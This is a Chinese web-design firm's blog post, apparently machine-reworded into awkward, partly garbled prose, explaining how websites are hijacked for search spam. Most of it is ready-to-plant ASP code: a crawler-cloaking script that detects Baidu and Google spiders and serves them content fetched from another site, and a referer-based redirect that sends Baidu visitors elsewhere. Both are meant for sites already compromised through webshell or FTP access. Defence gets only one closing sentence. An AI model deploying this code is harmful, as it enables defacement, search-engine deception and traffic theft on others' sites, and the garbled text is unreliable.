前不久見(jiàn)到有網(wǎng)民問(wèn)網(wǎng)址模塊劫持,網(wǎng)站快照劫持,百度新聞源劫持是怎么操作的。結(jié)論大部分朋友都表明不了解,我今天來(lái)跟大伙兒分享一下網(wǎng)址劫持是怎么操作的,如何防范。
1.網(wǎng)站快照劫持
動(dòng)態(tài)頁(yè)面主頁(yè)根據(jù)在PHP或是ASP,ASPX文檔中加上分辨編碼,分辨如果是蜘蛛瀏覽就修改標(biāo)題具體內(nèi)容,在文章標(biāo)題具體內(nèi)容載入聯(lián)系電話和違法廣告宣傳信息,要不是蜘蛛瀏覽也不做改動(dòng)。
靜態(tài)網(wǎng)頁(yè)主頁(yè),在下午三點(diǎn)上下刪除你的.html文件,加上inde.php,php中載入相近上邊的句子,如果是蜘蛛就回到修改了文章標(biāo)題的主頁(yè)具體內(nèi)容,并不是就回到正常的具體內(nèi)容。
快照更新劫持較為反感,即使你修補(bǔ)了劫持,百度搜索上依然會(huì)表明很長(zhǎng)一段時(shí)間的違法快照更新信息。
編碼如下所示:
<%
function GetBot()
'查看蜘蛛
dim s_agent
GetBot=""
s_agent=Request.ServerVariables("HTTP_USER_AGENT") '重要判斷語(yǔ)句
if instr(1,s_agent,"googlebot",1) >0 then
GetBot="google"
end if
if instr(1,s_agent,"msnbot",1) >0 then
GetBot="MSN"
end if
if instr(1,s_agent,"slurp",1) >0 then
GetBot="Yahoo"
end if
if instr(1,s_agent,"baiduspider",1) >0 then
GetBot="baidu"
end if
if instr(1,s_agent,"sohu-search",1) >0 then
GetBot="Sohu"
end if
if instr(1,s_agent,"lycos",1) >0 then
GetBot="Lycos"
end if
if instr(1,s_agent,"robozilla",1) >0 then
GetBot="Robozilla"
end if
end function
Function getHTTPPage(Path)
t = GetBody(Path)
getHTTPPage=BytesToBstr(t,"GB2312")'編號(hào)
End function
Function Newstring(wstr,strng)
Newstring=Instr(lcase(wstr),lcase(strng))
if Newstring<=0 then Newstring=Len(wstr)
End Function
Function GetBody(url)
on error resume next
Set Retrieval = CreateObject("Microsoft.XMLHTTP")
With Retrieval
.Open "Get", url, False, "", ""
.Send
GetBody = .ResponseBody
End With
Set Retrieval = Nothing
End Function
Function BytesToBstr(body,Cset)
dim objstream
set objstream = Server.CreateObject("adodb.stream")
objstream.Type = 1
objstream.Mode =3
objstream.Open
objstream.Write body
objstream.Position = 0
objstream.Type = 2
objstream.Charset = Cset
BytesToBstr = objstream.ReadText
objstream.Close
set objstream = nothing
End Function
Dim wstr,str,url,start,over,dtime
if GetBot="baidu" then
'給百度搜索蜘蛛訂制的具體內(nèi)容
url="http://baidu.seowhy.com"
'要想展現(xiàn)給蜘蛛的網(wǎng)頁(yè)詳細(xì)地址
wstr=getHTTPPage(url)
body=wstr
response.write ""&body&""
response.end
elseif GetBot="google" then
'給google 蜘蛛訂制的具體內(nèi)容
url="http://baidu.seowhy.com"
wstr=getHTTPPage(url)
body=wstr
response.write ""&body&""
response.end
end if
2.百度搜索引擎總流量劫持
這類劫持比快照更新劫持簡(jiǎn)易,同時(shí)在主頁(yè)加上,分辨瀏覽歸路是百度搜索引擎或是其他的JS源代碼,當(dāng)歸路是百度搜索引擎的過(guò)程中就自動(dòng)跳轉(zhuǎn)到目標(biāo)站。
編碼如下所示:
<%
ifinstr(Request.ServerVariables("http_referer"),"www.baidu.com")>0then
'假如客戶來(lái)自www.baidu.com
response.redirect("http://baidu.seowhy.com/")
'自動(dòng)跳轉(zhuǎn)特定詳細(xì)地址
end if
%>
3.DNS大白菜站劫持
在解析域名里加上泛分析到目的詳細(xì)地址,在總體目標(biāo)詳細(xì)地址服務(wù)器上很多形成劫持網(wǎng)站域名的分站。
匯總:1和2必須得到網(wǎng)址的WEBSHELL或是FTP,假如贏得了百度新聞源網(wǎng)址的這類管理權(quán)限,就能做百度新聞源劫持;3必須得到DNS管理方法賬號(hào)。因此導(dǎo)致網(wǎng)址被劫持的主要因素或是自身網(wǎng)址被侵入,或是被掃FTP的挖機(jī)掃出來(lái)了FTP賬號(hào)等,網(wǎng)絡(luò)信息安全沒(méi)搞好的緣故。因此只需網(wǎng)絡(luò)信息安全及時(shí),別人是劫持不你的企業(yè)網(wǎng)站的。歡迎大家持續(xù)關(guān)注專業(yè)網(wǎng)站建設(shè)企業(yè)的網(wǎng)址,希望大家可以經(jīng)思洋的網(wǎng)址初中到物品,提升自身的專業(yè)知識(shí)。
廣州天河區(qū)珠江新城富力盈力大廈北塔2706
020-38013166(網(wǎng)站咨詢專線)
400-001-5281 (售后服務(wù)熱線)
深圳市坂田十二橡樹莊園F1-7棟
Site/ http://www.szciya.com
E-mail/ itciya@vip.163.com
品牌服務(wù)專線:400-001-5281
長(zhǎng)沙市天心區(qū)芙蓉中路三段398號(hào)新時(shí)空大廈5樓
聯(lián)系電話/ (+86 0731)88282200
品牌服務(wù)專線/ 400-966-8830
旗下運(yùn)營(yíng)網(wǎng)站:
Copyright ? 2016 廣州思洋文化傳播有限公司,保留所有權(quán)利。 粵ICP備09033321號(hào)